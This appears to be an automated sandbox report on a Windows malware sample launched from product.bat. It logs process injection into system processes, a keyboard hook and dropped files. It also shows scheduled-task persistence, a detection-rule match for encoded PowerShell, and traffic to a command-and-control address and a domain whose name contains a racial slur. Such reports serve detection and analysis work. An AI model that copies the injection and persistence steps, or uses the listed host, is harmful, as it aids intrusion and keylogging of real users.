Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000000.1531285281.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3343115348.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1ED894 FindFirstFileExW,15_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21D894 FindFirstFileExW,15_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29D894 FindFirstFileExW,15_2_000001CA7D29D894
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5D894 FindFirstFileExW,16_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92D894 FindFirstFileExW,17_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1CADA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CAD894 FindFirstFileExW,18_2_00000262F1CAD894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0D894 FindFirstFileExW,18_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1D3DA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3D894 FindFirstFileExW,18_2_00000262F1D3D894
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001B68BD2DA18
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2D894 FindFirstFileExW,22_2_000001B68BD2D894
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001B68BD5DA18
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5D894 FindFirstFileExW,22_2_000001B68BD5D894
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001E591CCDA18
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCD894 FindFirstFileExW,23_2_000001E591CCD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13D894 FindFirstFileExW,26_2_000002234E13D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16D894 FindFirstFileExW,26_2_000002234E16D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1D894 FindFirstFileExW,27_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DD894 FindFirstFileExW,28_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570D894 FindFirstFileExW,28_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4D894 FindFirstFileExW,29_2_000002287AD4D894
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_000002287AD4DA18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9D894 FindFirstFileExW,30_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_000002520257DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257D894 FindFirstFileExW,31_2_000002520257D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025AD894 FindFirstFileExW,31_2_00000252025AD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCD894 FindFirstFileExW,32_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68D894 FindFirstFileExW,32_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BD894 FindFirstFileExW,32_2_000001A9EC6BD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC6BDA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF163DA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163D894 FindFirstFileExW,33_2_0000019FF163D894
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF19ADA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19AD894 FindFirstFileExW,33_2_0000019FF19AD894
Source: global trafficTCP traffic: 192.168.2.7:49764 -> 103.230.121.81:4988
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: iam.nigga.dad
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 0000001A.00000002.3406712131.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1477059978.000002234AE8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000010.00000000.1416987791.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000001A.00000002.3410804423.000002234B513000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000010.00000000.1417007094.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3362429168.0000017D2D493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000010.00000002.3357932105.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476780587.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3405486583.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476625383.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3404973305.000002234AE13000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.26.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 0000001A.00000000.1476780587.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3405486583.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476625383.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3408361314.000002234AEE7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1476689535.000002234AE34000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3405221017.000002234AE34000.00000004.00000001.00020000.00000000.sdmp, FB0D848F74F70BB2EAA93746D24D97490.26.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab
Source: svchost.exe, 0000001A.00000000.1477287322.000002234AEEE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?7cd3bd29ccfac
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000023.00000002.3351331204.00000213124B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
Source: lsass.exe, 00000010.00000000.1416970653.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3360104518.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1417029020.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3363525081.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000010.00000000.1416987791.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000010.00000000.1416987791.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416923916.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 00000012.00000000.1427635100.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000012.00000002.3415712940.00000262ED790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://osoft.co_2010-06X
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000002.3350244375.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416768127.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000010.00000002.3349200810.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416748782.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmp, Null.35.dr, Null.12.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.3376787099.0000021314381000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 8164, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: product.batStatic file information: 7309406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IhrFKM.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,14_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,15_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW,16_2_0000017D2DD52300
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CA2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,18_2_00000262F1CA2C80
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD42300 NtQuerySystemInformation,StrCmpNIW,29_2_000002287AD42300
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-mW41WeM4Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IhrFKM.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140001CF014_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140002D4C14_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_00000001400031D014_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_000000014000127414_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_000000014000243414_2_0000000140002434
Source: C:\Windows\System32\winlogon.exeCode function: 15_3_000001CA7D1BCE1815_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exeCode function: 15_3_000001CA7D1BCC9415_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exeCode function: 15_3_000001CA7D1B23F015_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1EDA1815_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1ED89415_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E2FF015_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21DA1815_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21D89415_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D212FF015_2_000001CA7D212FF0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29DA1815_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29D89415_2_000001CA7D29D894
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D292FF015_2_000001CA7D292FF0
Source: C:\Windows\System32\lsass.exeCode function: 16_3_0000017D2DD2CE1816_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exeCode function: 16_3_0000017D2DD2CC9416_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exeCode function: 16_3_0000017D2DD223F016_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5DA1816_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5D89416_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD52FF016_2_0000017D2DD52FF0
Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000022F4B8F23F017_3_0000022F4B8F23F0
Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000022F4B8FCE1817_3_0000022F4B8FCE18
Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000022F4B8FCC9417_3_0000022F4B8FCC94
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B922FF017_2_0000022F4B922FF0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92DA1817_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92D89417_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1EB23F018_3_00000262F1EB23F0
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1EBCE1818_3_00000262F1EBCE18
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1EBCC9418_3_00000262F1EBCC94
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1CD23F018_3_00000262F1CD23F0
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1CDCE1818_3_00000262F1CDCE18
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1CDCC9418_3_00000262F1CDCC94
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CA2FF018_2_00000262F1CA2FF0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CADA1818_2_00000262F1CADA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CAD89418_2_00000262F1CAD894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D02FF018_2_00000262F1D02FF0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0DA1818_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0D89418_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D32FF018_2_00000262F1D32FF0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3DA1818_2_00000262F1D3DA18
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3D89418_2_00000262F1D3D894
Source: C:\Windows\System32\cmd.exeCode function: 22_3_000001B68BCFCE1822_3_000001B68BCFCE18
Source: C:\Windows\System32\cmd.exeCode function: 22_3_000001B68BCFCC9422_3_000001B68BCFCC94
Source: C:\Windows\System32\cmd.exeCode function: 22_3_000001B68BCF23F022_3_000001B68BCF23F0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2DA1822_2_000001B68BD2DA18
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2D89422_2_000001B68BD2D894
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD22FF022_2_000001B68BD22FF0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5DA1822_2_000001B68BD5DA18
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5D89422_2_000001B68BD5D894
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD52FF022_2_000001B68BD52FF0
Source: C:\Windows\System32\conhost.exeCode function: 23_3_000001E591C9CE1823_3_000001E591C9CE18
Source: C:\Windows\System32\conhost.exeCode function: 23_3_000001E591C9CC9423_3_000001E591C9CC94
Source: C:\Windows\System32\conhost.exeCode function: 23_3_000001E591C923F023_3_000001E591C923F0
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCDA1823_2_000001E591CCDA18
